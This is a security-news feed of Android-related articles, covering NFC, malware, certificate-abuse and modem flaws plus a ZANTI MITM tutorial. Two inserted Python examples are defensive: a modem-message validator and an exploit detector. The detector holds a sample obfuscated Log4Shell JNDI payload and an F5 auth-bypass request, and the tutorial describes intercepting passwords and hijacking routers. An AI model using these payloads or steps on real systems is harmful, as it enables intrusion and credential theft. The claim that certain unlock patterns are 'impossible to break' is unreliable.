Information Security Newspaper | Infosec Articles | Hacking News (https://www.securitynewspaper.com/), feed last updated Tue, 12 Sep 2023 22:30:29 +0000

Exploiting Android App Pin feature to steal money from mobile wallets apps
https://www.securitynewspaper.com/2023/09/12/exploiting-android-app-pin-feature-to-steal-money-from-mobile-wallets-apps/ (Tue, 12 Sep 2023 22:30:28 +0000)

The post Exploiting Android App Pin feature to steal money from mobile wallets apps appeared first on Information Security Newspaper | Hacking News.

A determined attacker could exploit a flaw in the Android App Pin feature to make fraudulent purchases with Google Wallet. The vulnerability lets an attacker read the full card number and expiration date from a locked device. Exploiting CVE-2023-35671 requires physical access to the victim's device: the attacker puts the device into App Pin mode and holds it against an NFC reader. Once the card data has been read, it can be used to make a fraudulent payment.
The vulnerability was discovered by the ethical hacker Tiziano Marra. CVE-2023-35671 is not a typical security flaw: at its core is an information disclosure weakness that stems from a logic error. The consequence is that an attacker can harvest the full card number and the card's expiry date.

The vulnerability lives in the Android App Pin feature. App pinning was originally called "screen pinning" when it was introduced with Android 5.0 Lollipop (API level 21) on November 12, 2014. On Android phones, this security feature gives users more control over their privacy and better protection for their data.

App pinning lets users restrict their device to a single app, which blocks access to other apps and to sensitive data. This is useful when a focused work environment is needed, when a device serves as a public terminal, or when a device is shared. It stops unauthorized users from reaching personal data, apps, and settings, which makes for a more secure experience overall.

Using app pinning as a form of application management typically involves the following steps:

Users enable the feature by opening the Settings menu on their phone, selecting the Security and Privacy menu, then More Security Settings, and then the App Pinning option. Once it is enabled, users can choose which app they want to pin.

Launching the chosen app is the first step of the pinning process, which puts the device into pinned mode. From then on the device is locked to that app's user interface.

In pinned mode you cannot interact with any other app, because they are temporarily hidden from view. If you try to switch to another app, open notifications, or perform any other action while the pinned app is open, the device reminds you that you are in pinned mode and keeps you there.

Exiting pinned mode: users usually have to provide an extra layer of authentication to leave this mode. This can be a pre-set PIN, pattern, or password, or biometric recognition such as a fingerprint or face recognition. Because of this additional check, only authorized users can exit the pinned app environment.

Pinning an Android app has many advantages, including the following:

Privacy and security: pinned mode protects users by preventing unwanted access to private information, data, and apps that are considered particularly sensitive.

Public terminals: app pinning matters for kiosks and shared devices, since it confines users to a single app and so reduces the risk of unauthorized access and data exposure.

Focus and productivity: users can create a focused work environment by limiting the device to a single task-oriented app, which can improve their productivity.

Parental control: pinning an app lets parents limit their children's access to games and apps that are age-appropriate or educational.

In a nutshell, Android app pinning, formerly known as "screen pinning," was launched with Android 5.0 Lollipop and offers fine-grained control over what the device can do and what it can access. By designating a single app that may be used and requiring authentication to leave that mode, it provides better security, privacy, and focused interaction with digital content.

A logic error in the code makes it possible for a general-purpose NFC reader to read the full card number and expiration date even while the device screen is locked. The issue is in onHostEmulationData in the file HostEmulationManager.java. It can lead to local information disclosure with no additional execution privileges needed, and exploitation does not require user interaction.

Google rates the severity of this vulnerability as high. Along with his findings, the researcher submitted a proof-of-concept attack, which underlined the seriousness of this high-severity vulnerability.


10 impossible mobile patterns to break
https://www.securitynewspaper.com/2023/08/08/10-impossible-mobile-patterns-to-break/ (Tue, 08 Aug 2023 17:32:30 +0000)


Mobile patterns are used by almost everyone to unlock their phones, and most people prefer a pattern over a passcode or password. One of the main reasons is how easy a pattern makes it to unlock the phone. The more stylish your pattern, the cooler you look while unlocking your phone, and a good pattern also helps against shoulder-surfing attacks. So we will show you the 10 most impossible mobile patterns to break. Even if you unlock your phone in front of somebody, he or she will not be able to guess it. Not even your girlfriend or boyfriend will be able to guess your pattern.

So without wasting too much time, we will show you the top 10 mobile patterns that are hard to break. Before we jump in, understand that a pattern is a combination of 9 dots in most cases. The figure below will help you understand the numbers behind these patterns.

Now that we understand the concept behind the pattern: whenever we draw a pattern, it is converted into a sequence of numbers, and the phone uses that sequence as the password to unlock. Let's see which are the 10 most impossible mobile patterns to break.

1. FISH (2-5-8-4-6-9-3-1)

This is called the fish pattern, and the numbers in brackets are the sequence of dots to follow to draw a pattern that resembles a fish. It starts at dot 2, then draws a line to dot 5, then from dot 5 to the next dot in the sequence, and so on, as shown below.

Fish mobile pattern

2. Love Angle (2-5-9-1-4-8-6-3-7)

This is the love angle pattern; use it if you love someone but don't want to tell him or her.

3. Ribbon (5-7-3-6-4-1-9)

4. Bird man mobile pattern (2-5-7-3-6-4-1-9)

5. Robo Head (2-5-4-6-3-9-8-7-2)

6. MKBHD (4-8-6-9-3-5-1-7)

7. Illusion (2-1-3-5-4-6-8-7-9)

8. Impossible (8-6-5-4-2-1-3-7-9)

9. MAZE (1-2-5-4-6-3-9-8-7)

10. Time Machine (8-6-5-4-2-3-1-9-7)

The one important thing is that whenever you use any of these patterns, note down the number sequence. You can refer back to it in case you get caught in your own trap.


I think someone is spying me using AirTag, what should I do?
https://www.securitynewspaper.com/2023/04/03/i-think-someone-is-spying-me-using-airtag-what-should-i-do/ (Mon, 03 Apr 2023 21:21:26 +0000)


An Apple AirTag can make it easier to keep track of your most important belongings, such as keys, wallets, remote controls, and even motorcycles. Yet allegations that AirTags have been used to track people without their consent have cast an unfavorable light on how these devices are used. If you have reason to believe that someone is tracking your whereabouts with an AirTag, your iPhone may warn you before you have to do anything. If you believe you may be in danger because someone is following you without your consent and you decide to contact law enforcement, Apple can provide further information about the AirTag's owner.

You will be notified
If you have an iPhone and an AirTag is tracking you, your phone may show a notification that says "AirTag found moving with you." This happens when all of the following conditions are met:

The AirTag has been separated from its owner.
Your iPhone is awake.
The AirTag makes a sound when it is moved.
The same applies to other accessories that work with the Find My network, such as AirPods, AirPods Pro, or AirPods Max. Each of them makes a sound when moved while away from its owner.

Verify that Tracking Notifications are turned on.
If you do not get an alert, you may need to complete the following steps to make sure that tracking alerts are enabled:

Open the Settings menu and choose Privacy.
Choose Location Services and turn it on.
Go to the System Services menu.
Turn on Find My iPhone and enable the Notable Places feature.
Return to the Settings menu and choose Bluetooth.
Make sure Bluetooth is on.
Finally, open the Find My app and select yourself.
Turn on Tracking Notifications.

Try the Find My app.
When an AirTag is separated from its owner, it plays a sound whenever it is moved, to help others find it. If you hear what might be an AirTag, or another sound you cannot identify and suspect may be an AirTag, first confirm that the settings in the previous step are in place, then open the Find My app to check whether an AirTag is detected.

Make the AirTag play a sound.
If you have been notified that an AirTag is traveling with you and you open the Find My app, you can play a sound on the device to locate it faster. To do so, tap the alert, select Continue, and then tap Find Nearby; the Find My app then helps you locate the other person's AirTag.

Check the AirTag's details
Once you can see the AirTag, you can read the information it contains with your iPhone or any other NFC-capable smartphone. Hold the top of your iPhone close to the white side of the AirTag and wait for it to be recognized. A notification appears with a link to a webpage that shows the last four digits of the owner's phone number and the AirTag's serial number. If the AirTag was reported lost, the owner may have added contact information so that whoever finds it can get in touch.

Disable the AirTag.
Once the AirTag is disabled, its owner can no longer see its location or receive updates about it. Removing the battery is all it takes to deactivate an AirTag: open it by pressing down on the button on top and turning the lid counterclockwise, then remove the battery.

As long as an AirTag is close to another person's iPhone, its position can be determined. And with Apple's release of an official app for detecting AirTags on Android devices, you no longer need an Apple device to do that. There is, however, one significant exception to this rule.

Alongside Apple Music, the Beats app, and the app for moving to iOS, Tracker Detect is one of the few Apple applications available on Android. If you want to zero in on a specific rogue AirTag, you can use the app to play a sound on it, and you can also use it to look for rogue AirTags nearby. From there, you can scan the AirTag with an NFC reader or turn it off by removing its battery. The functionality is quite basic, even though the app looks rather nice. Since it has no auto-scan feature, you will not get alerts about nearby unknown AirTags as you would on an iPhone; to look for a tag, you have to launch the app manually first. One could argue that this makes Tracker Detect rather useless, and many reviewers of the app believe it ought to be able to auto-scan. Manually scanning your surroundings for AirTags every five minutes is not the most effective use of your time.

There are no real roadblocks to making that happen on Android phones either; all it needs is Bluetooth Low Energy (BLE). Enabling auto-scanning for AirTags on non-Apple devices, and having those devices participate in Apple's Find My network, would also considerably improve the success rate of finding AirTags in general. If you have an Android device and want to scan for AirTags with it, download the app from the Google Play Store.


This new android malware allows to hack & spy on any Android phone
https://www.securitynewspaper.com/2023/01/20/this-new-android-malware-allows-to-hack-spy-on-any-android-phone/ (Fri, 20 Jan 2023 21:01:18 +0000)


Cybercriminals are now selling a new piece of Android malware called "Hook," which boasts the ability to take remote control of mobile devices in real time via VNC (virtual network computing). The malware is advertised as having been "built from scratch." That claim is questionable, because the bulk of the code base is still the one created for Ermac; it even includes some instructions in Russian.

This iteration of the malware does include quite a few changes compared to its predecessor, but it is clearly an upgrade and enhancement of earlier Ermac versions rather than a new family. The most plausible explanation is that the criminals, borrowing a common marketing tactic, decided to launch a new brand with their latest product rather than keep the existing one, which was associated mainly with cryptowallet theft and the exfiltration of personally identifiable information (PII). Once the malware has been installed and configured, the bot attempts to contact its C2 server over standard HTTP traffic.

In its communication with the C2 server, Hook uses the same encryption scheme as Ermac: the data is first Base64-encoded and then encrypted with AES-256-CBC using a hardcoded key. In addition to the HTTP traffic used by earlier Ermac versions, this new variant also uses WebSocket communication. The implementation relies on Socket.IO, a library built on HTTP and WebSocket that provides real-time, bidirectional communication between web clients and servers. This is the channel over which the bot registers itself with its server, sends the list of apps installed on the device, and downloads its list of targets.


The most significant improvement in capabilities comes from a component referred to as VNC (virtual network computing). Strictly speaking, VNC is a specific kind of software for screen sharing and remote control of a device, but threat actors use the term loosely for any remote-control functionality found in a Remote Access Tool (RAT). In Hook's case, this is implemented by interacting with the UI elements needed for a wide range of tasks through the Accessibility Services.

Hook thus joins the ranks of malware families capable of full DTO (device takeover) and of completing an entire fraud chain without any additional channels, from the exfiltration of personally identifiable information all the way through to the transaction. The fact that fraud-scoring systems have a much harder time identifying this kind of activity is the primary selling point for Android bankers.

The malware can simulate a wide variety of user actions on the device, such as clicking, filling in text fields, and performing gestures. The following is the list of new commands associated with the reported RAT features.

As with earlier iterations of Ermac, the target list is quite comprehensive and includes institutions from all over the world.

The actor promises buyers more than a hundred targets, the vast majority of which are the same targets that were available in earlier Ermac editions. This updated version, however, adds hundreds more targets, some of them social applications and others financial applications. New targets include institutions in South America, Asia, Africa, and the Middle East.

You may obtain a quick review of the areas that Hook focuses on the most by looking at the following:

The recent developments around Hook, the newest member of the Ermac malware family, point in a very specific direction. Hook now belongs to the very dangerous class of malware that can carry out a complete attack chain, from infection to fraudulent transaction. On top of that, it comes with new features typical of spyware, which let criminals monitor the device and gain full visibility not only into the victim's financial information but also into their messaging and geolocation, along with control over the files stored on the phone. As mentioned earlier, Ermac was one of the most widely distributed malware families in 2022. With the release of its latest development, Hook, ThreatFabric expects Ermac to make the final quality leap and join Hydra and ExobotCompact/Octo on the podium of Android bankers available for rent.


Bad news! The platform certificates of many phone manufacturers have been hacked. These are used to sign trusted apps on Android phones. Now these certificates are being used to certify malicious Android applications
https://www.securitynewspaper.com/2022/12/02/bad-news-the-platform-certificates-of-many-phone-manufactures-have-been-hacked-these-are-used-to-sign-trusted-apps-on-android-phones-now-these-certificates-are-being-used-to-certify-malicious-andro/ (Fri, 02 Dec 2022 19:27:23 +0000)


Platform certificates, also known as platform keys, are used by OEM Android device makers to sign the core ROM images of their devices. These images include the Android operating system itself and the related system applications.

The platform certificate is the application-signing certificate used to sign the "android" application on the system image. That application runs with the highly privileged android.uid.system user id and holds system permissions, including permission to access user data.

Any application, including a malicious one, that is signed with the same platform certificate can be assigned the same privileged android.uid.system user id and thereby gain system-level access to the Android device.

The abuse of platform keys was detected by Lukasz Siewierski, a reverse engineer on Google's Android Security team. The finding was published in a report that is publicly available on the Android Partner Vulnerability Initiative (APVI) issue tracker.

Siewierski found multiple malware samples signed with 10 different Android platform certificates. He provided the SHA256 hashes of each sample as well as of the certificates used to sign them.

There is no information at this time on how these certificates came to be misused to sign malware. It is unknown whether one or more threat actors stole the certificates, or whether an authorized employee signed the APKs with the vendor keys.

There is also no information on where these malware samples were found, such as whether they were on the Google Play Store, distributed through third-party stores, or used in active attacks.

Google notified all affected vendors of the misuse and advised them to rotate their platform certificates, investigate the incident to determine how it occurred, and minimize the number of applications signed with their Android platform certificates.

According to Google, there is no evidence that this malicious code was ever distributed via the Google Play Store, and its standard advice to users remains to make sure they are running the latest version of Android.

A simple way to get an overview of the Android apps signed with these potentially compromised certificates is to search APKMirror for apps signed with them.


Threat actors could access user data stored in the Amazon cloud due to vulnerabilities in nearly 2,000 iOS and Android apps
https://www.securitynewspaper.com/2022/09/02/threat-actors-could-access-user-data-stored-in-the-amazon-cloud-due-to-vulnerabilities-in-nearly-2000-ios-and-android-apps/ (Fri, 02 Sep 2022 18:39:09 +0000)


A total of 1,859 iOS and Android apps contain serious vulnerabilities that pose a significant security risk. The findings come from Symantec, which exposed the issue that could have endangered the private data of users and companies.

The vulnerability concerns access tokens for the Amazon Web Services (AWS) cloud. According to the analysis, 77% of the examined apps contained the credentials in their code, where potential attackers could find them and use them to access private services.

One of the vulnerabilities was exploited to extract data from thousands of clients of a bank

As the researchers explain, AWS access credentials are normally used to connect to the resources an application needs to do its job, including configuration files or authentication data for other services.

The problem is that the more than 1,800 apps analyzed had these credentials embedded directly in their code. Worse still, more than half of the applications used the same access credentials as apps from other companies and developers.

To make matters worse, 47% of the identified applications contained valid AWS tokens granting full access to all private files and Amazon Simple Storage Service (S3) buckets in the cloud, including infrastructure files and data backups, among other things.

After analyzing the vulnerability, the researchers described the case of a company that offers a communications platform for its clients along with a mobile development kit, and that had embedded the access keys in the SDK code. As a result, the data of all of its clients was exposed, including corporate data and financial records belonging to more than 15,000 medium and large companies.

That's not all. In the case of five iOS applications belonging to banks, it was possible to obtain the biometric authentication data of more than 300,000 clients. The research team has since notified the companies responsible for developing the affected apps. Unfortunately, Symantec has not shared a list of the applications affected by the vulnerability.


Tutorial for pentesting Android apps using the free ZANTI toolkit
https://www.securitynewspaper.com/2022/07/15/tutorial-for-pentesting-android-apps-using-the-free-zanti-toolkit/ (Fri, 15 Jul 2022 15:22:34 +0000)


In this tutorial, the specialists of the Cyber Security 360 course of the International Institute of Cyber Security (IICS) show how to use ZANTI, a pentesting tool for attacking a given network that can also exploit routers, audit passwords, create and run HTTP servers, scan devices for open ports, and more.

With this tool, a hacker can crack passwords from an Android phone and modify HTTP requests and responses, enabling wireless network compromise scenarios from the phone itself.

As usual, we remind you that this tutorial was prepared for informational purposes only and does not represent a call to action, so IICS is not responsible for the misuse that may be given to the information contained herein.

Before we continue, let’s take a look at all the actions we can take using ZANTI:

  • Hack HTTP sessions using Man-in-The-Middle (MiTM) attacks
  • Download capture
  • Modification of HTTP requests and responses through MiTM attacks
  • Router hijacking
  • Password interception
  • Scanning devices for Shellshock and SSL Poodle vulnerabilities
  • Detailed nmap scanning

Installing ZANTI

Follow the steps listed by the experts in the Cyber Security 360 course to install ZANTI correctly:

  • Go to the official website from https://www.zimperium.com/zanti-mobile-penetration-testing
  • Enter an email address
  • The download link will be available shortly
  • Download the APK
  • Select the option Install from unknown sources if necessary
  • Install the APK
  • Open the app, grant the required permissions and connect to a WiFi network

Let’s take a closer look at the features of the tool.

Hack HTTP sessions with MiTM

As soon as the "HTTP Redirect" feature is enabled, all HTTP traffic is redirected to a default server or site. You can also redirect it to a specific website by tapping the settings icon, where you will find a field to enter the URL.

Download capture

This feature lets you connect to the host's downloads folder and copy all of its contents. For example, if you select ".pdf" from the menu and tap "Upload File", all PDF files are downloaded to your phone.

This tactic can be especially useful in social engineering, note the experts of the Cyber Security 360 course.

Modification of HTTP requests and responses through MiTM attacks

With zPacketEditor you can change HTTP requests and responses on your network. It is an interactive mode that lets you edit and resubmit each request and response. However, it is fiddly and may not work on every phone.

Hijack routers

Router pwn is a web application for exploiting router vulnerabilities: a collection of local and remote exploits that are ready to run.

To use it, tap “Routerpwn.com”, then select the router vendor. The site lists the known flaws for that vendor, so you can read up on each one before trying it.

Password interception

This is the main feature of ZANTI and allows the capture of passwords on the network, mention the experts of the Cyber Security 360 course. Select the target device and tap the MITM button; the results appear in the saved passwords section. Only credentials sent in cleartext (plain HTTP, FTP and similar protocols) are captured; sites that enforce HTTPS with HSTS are not exposed this way.

Scanning devices for Shellshock and SSL Poodle vulnerabilities

First select the target device, then tap “Shellshock/SSL Poodle” to scan it. Wait for the scan to finish and read the result; a host reported as vulnerable can then be targeted with the corresponding exploit.

nmap scanning

This feature gives you the important information about the target and the network: open ports, IP addresses, operating systems, and so on. It is very useful for finding exploits relevant to the target, mention the experts of the Cyber Security 360 course.

These are the basics of using ZANTI, which can prove very useful for penetration testing over wireless networks from an Android device.

Feel free to access the International Institute of Cyber Security (IICS) websites to learn more about information security risks, malware variants, vulnerabilities, and to learn more about the Cyber Security 360 course.

The post Tutorial for pentesting Android apps using the free ZANTI toolkit appeared first on Information Security Newspaper | Hacking News.

Millions of Android smartphones exposed to remote hacking due to vulnerability in UNISOC baseband chips https://www.securitynewspaper.com/2022/06/02/millions-of-android-smartphones-exposed-to-remote-hacking-due-to-vulnerability-in-unisoc-baseband-chips/ Thu, 02 Jun 2022 17:28:20 +0000 https://www.securitynewspaper.com/?p=25364

The post Millions of Android smartphones exposed to remote hacking due to vulnerability in UNISOC baseband chips appeared first on Information Security Newspaper | Hacking News.

It may not sound familiar to millions of mobile phone users, but Chinese chipmaker UNISOC has been a major member of the industry for just over 20 years. Founded as Spreadtrum Communications in 2001, the company grew rapidly to be present on more than half of Chinese phones by 2011. Currently, the firm produces budget chipsets for Android devices compatible with 2G, 3G, 4G and 5G technology, in addition to smart TVs and more, with a predominant presence in Asia and some regions of Africa and only behind giants such as Qualcomm and MediaTek.

While UNISOC is a major chip producer, its technology has received little attention from mobile security specialists, so it is hard to know what security risks are present in devices with these chips; until now there were no public references to any vulnerability in their firmware.

A recent research effort by Check Point Research focuses on the modem of smartphones with UNISOC chips. This component is an attractive target for attackers because it can be reached remotely and relatively easily, with the potential for denial of service (DoS) attacks that cut off the communications of the affected devices.

Basic attack concepts

The Long-Term Evolution (LTE) network is made up of a dozen protocols and components, and some familiarity with it is needed to understand how the UNISOC modem works. The 3GPP group introduced the Evolved Packet System (EPS), an LTE architecture consisting of three interconnected components:

  • User equipment (UE)
  • Evolved UMTS terrestrial radio access network (E-UTRAN)
  • Evolved Packet Core (EPC)

E-UTRAN has only one stack, the eNodeB base station, which controls radio communications between the UE and the EPC. A UE can be connected to one eNodeB at a time.

The EPC component consists of four stacks, one of which is the Mobility Management Entity (MME). The MME controls the high-level operations of mobile devices on the LTE network. This component sends signaling messages related to security control, management of tracking areas, and mobility maintenance.

Check Point Research’s tests, conducted on a smartphone with a UNISOC modem, focus on communications between the MME and UE stacks, which take place via the EPS session management (ESM) and EPS mobility management (EMM) protocols. The following screenshot shows the protocol stack of the modem. The non-access stratum (NAS) layer hosts the ESM and EMM signaling messages.

The NAS protocol operates on high-level structures, so a threat actor can craft a malformed EMM packet and send it to a vulnerable device, whose modem will parse it and create internal objects based on the information received.

A bug in this parsing code lets an attacker crash the modem and could potentially be leveraged for remote code execution (RCE).

Security flaws in NAS handlers

Most NAS message parsers take three arguments: an output buffer, which is an object of the matching message structure; the NAS message data blob to decode; and the current offset within that blob.

This uniform function signature makes it easy to build a harness to fuzz the NAS parsing functions. Check Point used the classic combination of AFL and QEMU to fuzz the modem binary on a PC, patching the binary to redirect its malloc calls to the libc equivalent. The fuzzer mutated the NAS message data and passed it as the input buffer to the parsing function.

One of the optional fields of ATTACH_ACCEPT is the mobile identity. The modem firmware implements an unpacking function similar to srsRAN’s liblte_mme_unpack_mobile_id_ie to extract the mobile identity from the NAS message. The identity data block begins with the length of the identity; if the device is identified by an International Mobile Subscriber Identity (IMSI), length − 2 bytes of message data are copied to the output buffer as the IMSI number.

The check that the supplied length is greater than one is missing, so any smaller value underflows: with a length field of zero, 0 − 2 = 0xFFFFFFFE bytes of the NAS message are copied into heap memory, leading to a DoS condition.
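The length check described above, as an added example (Python, not UNISOC or Check Point code): a decoder for the IMSI form of the Mobile Identity IE that validates the length octet and the available bytes before using them, next to a model of the buggy length − 2 computation with 32-bit wraparound. The sample IEs are constructed for this example; the byte layout follows the 3GPP Mobile Identity encoding (IEI 0x23, length octet, type of identity in the low three bits of the first identity octet, odd/even flag in bit 4, BCD digits in the remaining nibbles).

```python
"""Safe decoding of the NAS Mobile Identity IE (IMSI form) next to a model of the
length arithmetic behind the UNISOC modem bug. Added example; not vendor code."""
from typing import Optional, Tuple

MOBILE_ID_IEI = 0x23      # IEI of the optional Mobile Identity IE in ATTACH ACCEPT
TYPE_IMSI = 0x01          # type-of-identity value for IMSI
IMSI_MAX_DIGITS = 15      # IMSI is at most 15 BCD digits


def vulnerable_copy_len(ie_len: int) -> int:
    """Model of the buggy computation: copy (length - 2) bytes with no lower bound.
    Emulates 32-bit unsigned arithmetic, so a length of 0 wraps to 0xFFFFFFFE."""
    return (ie_len - 2) & 0xFFFFFFFF


def decode_mobile_id_imsi(msg: bytes, offset: int = 0) -> Tuple[str, int]:
    """Decode an IMSI Mobile Identity IE starting at msg[offset].
    Returns (imsi_digits, new_offset); raises ValueError on malformed input
    instead of trusting the length octet."""
    if len(msg) < offset + 2:
        raise ValueError("truncated: need IEI and length octets")
    if msg[offset] != MOBILE_ID_IEI:
        raise ValueError("not a Mobile Identity IE")
    ie_len = msg[offset + 1]
    if ie_len < 1:                                   # the lower-bound check the bug lacks
        raise ValueError("identity length must be at least 1")
    body = msg[offset + 2 : offset + 2 + ie_len]
    if len(body) != ie_len:                          # IE must fit inside the message
        raise ValueError("identity length exceeds message")
    if body[0] & 0x07 != TYPE_IMSI:
        raise ValueError("not an IMSI identity")
    odd = (body[0] >> 3) & 1                         # bit 4: odd number of digits
    ndigits = 2 * ie_len - 1 - (0 if odd else 1)     # even count leaves a 0xF filler nibble
    if not 1 <= ndigits <= IMSI_MAX_DIGITS:
        raise ValueError(f"invalid IMSI digit count {ndigits}")
    nibbles = [body[0] >> 4]                         # digit 1 is the high nibble of octet 1
    for octet in body[1:]:
        nibbles += [octet & 0x0F, octet >> 4]        # low nibble first, then high nibble
    digits = nibbles[:ndigits]
    if any(d > 9 for d in digits):
        raise ValueError("non-BCD digit in IMSI")
    return "".join(str(d) for d in digits), offset + 2 + ie_len


# Constructed sample IEs (not taken from the Check Point report).
GOOD_IE = bytes([0x23, 0x08, 0x09, 0x10, 0x10, 0x10, 0x32, 0x54, 0x76, 0x98])  # IMSI 001010123456789
ZERO_LEN_IE = bytes([0x23, 0x00, 0x01])   # length 0: the underflow trigger
ONE_LEN_IE = bytes([0x23, 0x01, 0x01])    # length 1, even flag: zero digits, must be rejected
TRUNCATED_IE = bytes([0x23, 0x08, 0x09])  # claims 8 identity octets, carries 1


def safe_decode(msg: bytes) -> Optional[str]:
    """Return the IMSI string, or None when the parser rejects the IE."""
    try:
        return decode_mobile_id_imsi(msg)[0]
    except ValueError:
        return None


if __name__ == "__main__":
    print(f"length 0 -> buggy copy length 0x{vulnerable_copy_len(0):08X}")
    for name, sample in [("good", GOOD_IE), ("zero-length", ZERO_LEN_IE),
                         ("one-length", ONE_LEN_IE), ("truncated", TRUNCATED_IE)]:
        print(f"{name:12s} -> {safe_decode(sample)}")
```

The point of the decoder is that every quantity derived from attacker-controlled bytes (the length octet, the digit count, the slice of the message) is checked against what is actually present before anything is copied; the buggy model shows why a single missing lower bound turns a one-byte field into a multi-gigabyte copy.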

In the following screenshot, you can see the ATTACH_ACCEPT message that triggers the overflow. The highlighted 0x23 value indicates that the following data is the identity block of the message, where the first 0x01 is the length and the second 0x01 is the IMSI type.

Conclusions

UNISOC has acknowledged the flaw, which has been assigned CVE-2022-20210. While the attack described by Check Point is not easy to carry out and requires considerable resources and planning, the possibility of exploitation is real and should not be dismissed.

UNISOC says the flaw will be properly addressed, protecting millions of smart device users. Google is also aware of the report and will ship additional protections for the Android system.

Feel free to access the International Institute of Cyber Security (IICS) websites to learn more about information security risks, malware variants, vulnerabilities, and information technologies.

EnemyBot: New IoT malware exploits one-day vulnerabilities to hack thousands of devices https://www.securitynewspaper.com/2022/05/31/enemybot-new-iot-malware-exploits-one-day-vulnerabilities-to-hack-thousands-of-devices/ Tue, 31 May 2022 17:53:59 +0000 https://www.securitynewspaper.com/?p=25350

The post EnemyBot: New IoT malware exploits one-day vulnerabilities to hack thousands of devices appeared first on Information Security Newspaper | Hacking News.

Cybersecurity specialists from AT&T Alien Labs report the detection of an Internet of Things (IoT) malware variant targeting content management systems (CMS), web servers, and Android devices. The malware is attributed to the hacking group Keksec, formed in 2016, which operates several botnets.

The malware, identified as EnemyBot, targets services such as VMware Workspace ONE, Adobe ColdFusion, and WordPress, as well as some IoT and Android devices. EnemyBot has been deployed at an astonishing speed thanks to the exploitation of known security flaws.

This new malware was developed from the source code used by other botnets, including Mirai, Qbot, and Zbot. Hackers use EnemyBot to target Linux systems and IoT devices.  

A closer look

According to the report, the malware is divided into four main sections:

  • A Python script, ‘cc7.py’, used to download all dependencies and compile the malware for different operating systems and architectures (x86, ARM, macOS, OpenBSD, PowerPC, MIPS). After compilation, a batch file, “update.sh”, is created for propagating the malware
  • The main source code, which includes all the functions of EnemyBot and incorporates source code from the other botnets
  • A hide.c segment that is manually compiled and executed to encode/decode the malware’s strings
  • A command and control (C&C) component that receives commands and payloads from the operators

The malware also includes a scanner for vulnerable IP addresses and an “adb_infect” function, which abuses the Android Debug Bridge to compromise mobile devices.

Among the flaws exploited in this campaign are:

  • CVE-2021-44228 and CVE-2021-45046, also known as Log4Shell
  • CVE-2022-1388, a vulnerability in F5 BIG-IP devices
  • CVE-2022-25075, a flaw in TOTOLINK A3000RU routers
  • CVE-2021-35064, a flaw in Kramer VIAware
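As an added example (not AT&T Alien Labs or EnemyBot code), here is detection logic for two of the exploitation patterns in the list above, run over a handful of constructed request records: Log4Shell, a JNDI lookup string placed in any header, path or body, including the nested lookup obfuscation commonly used to evade naive matching; and CVE-2022-1388, the F5 BIG-IP iControl REST authentication bypass, in which X-F5-Auth-Token is named in the Connection header so that the front-end drops the token before the request reaches /mgmt/tm/util/bash. The record shape is an assumed simplification of a reverse-proxy log, and the addresses are from documentation ranges.

```python
"""Flag HTTP requests that match the Log4Shell and CVE-2022-1388 exploitation
patterns. Added example; request records and patterns are constructed."""
import re
from typing import Dict, List

# Simple Log4j lookup obfuscations seen in the wild: ${lower:j}, ${upper:N}, ${::-d}
_LOG4J_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}|\$\{::-([^{}]*)\}", re.IGNORECASE)


def unwrap_log4j(text: str) -> str:
    """Repeatedly resolve nested lookup wrappers so '${${lower:j}ndi:' becomes '${jndi:'."""
    previous = None
    while previous != text:
        previous = text
        text = _LOG4J_WRAPPER.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), text)
    return text.lower()


def classify(req: Dict) -> List[str]:
    """Return the CVE identifiers whose exploitation pattern the request matches."""
    hits: List[str] = []
    headers = {k.lower(): v for k, v in req.get("headers", {}).items()}
    fields = [req.get("path", ""), req.get("body", "")] + list(headers.values())
    # Log4Shell: a JNDI lookup anywhere the server might log the value
    if any("${jndi:" in unwrap_log4j(field) for field in fields):
        hits.append("CVE-2021-44228")
    # CVE-2022-1388: bash endpoint plus the auth token listed as a hop-by-hop header
    if (req.get("path", "").startswith("/mgmt/tm/util/bash")
            and "x-f5-auth-token" in headers.get("connection", "").lower()):
        hits.append("CVE-2022-1388")
    return hits


# Constructed request records (not real traffic); 203.0.113.0/24 and 198.51.100.0/24 are documentation space.
SAMPLE_REQUESTS = [
    {"src": "203.0.113.10", "method": "GET", "path": "/", "body": "",
     "headers": {"User-Agent": "${${lower:j}${::-n}di:ldap://203.0.113.10:1389/a}"}},
    {"src": "203.0.113.11", "method": "POST", "path": "/mgmt/tm/util/bash", "body": '{"command":"run"}',
     "headers": {"Connection": "keep-alive, X-F5-Auth-Token", "X-F5-Auth-Token": "a",
                 "Authorization": "Basic YWRtaW46"}},
    {"src": "198.51.100.7", "method": "POST", "path": "/mgmt/tm/util/bash", "body": '{"command":"run"}',
     "headers": {"Connection": "keep-alive", "X-F5-Auth-Token": "valid-session-token"}},
    {"src": "198.51.100.8", "method": "GET", "path": "/wp-login.php", "body": "",
     "headers": {"User-Agent": "Mozilla/5.0"}},
]


def scan(requests: List[Dict]) -> Dict[str, List[str]]:
    """Map each source address to the CVEs its requests match, omitting clean sources."""
    report: Dict[str, List[str]] = {}
    for req in requests:
        hits = classify(req)
        if hits:
            report.setdefault(req["src"], []).extend(hits)
    return report


if __name__ == "__main__":
    for src, cves in scan(SAMPLE_REQUESTS).items():
        print(f"{src}: {', '.join(cves)}")
```

The third record shows why the F5 rule keys on the Connection header rather than on the endpoint alone: an administrator calling /mgmt/tm/util/bash with a valid token is normal, while naming the token header as hop-by-hop is the bypass. Run against real logs, the unwrap step should be applied to URL-decoded values as well, since the lookup string is frequently percent-encoded.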

While researchers believe this campaign is in its early stages, the constant updating that malware receives and the possibility of exploiting multiple vulnerabilities would allow hackers to deploy massive campaigns soon.

Feel free to access the International Institute of Cyber Security (IICS) websites to learn more about information security risks, malware variants, vulnerabilities, and information technologies.

More than 200 apps on Play Store with millions of downloads are stealing users’ passwords and sensitive information https://www.securitynewspaper.com/2022/05/17/more-than-200-apps-on-play-store-with-millions-of-downloads-are-stealing-users-passwords-and-sensitive-information/ Tue, 17 May 2022 19:28:16 +0000 https://www.securitynewspaper.com/?p=25294

The post More than 200 apps on Play Store with millions of downloads are stealing users’ passwords and sensitive information appeared first on Information Security Newspaper | Hacking News.

Researchers at Trend Micro identified a set of mobile apps available on the Google Play Store performing malicious tasks in the background, including stealing user credentials and banking details from Android users. Some of these apps have nearly 100,000 downloads, so the scope of the problem is considerable.

In total, the analysis identified 200 malicious applications hiding the code of dangerous malware variants, capable of putting users of the affected devices in serious trouble.

Simple tools, complex issues

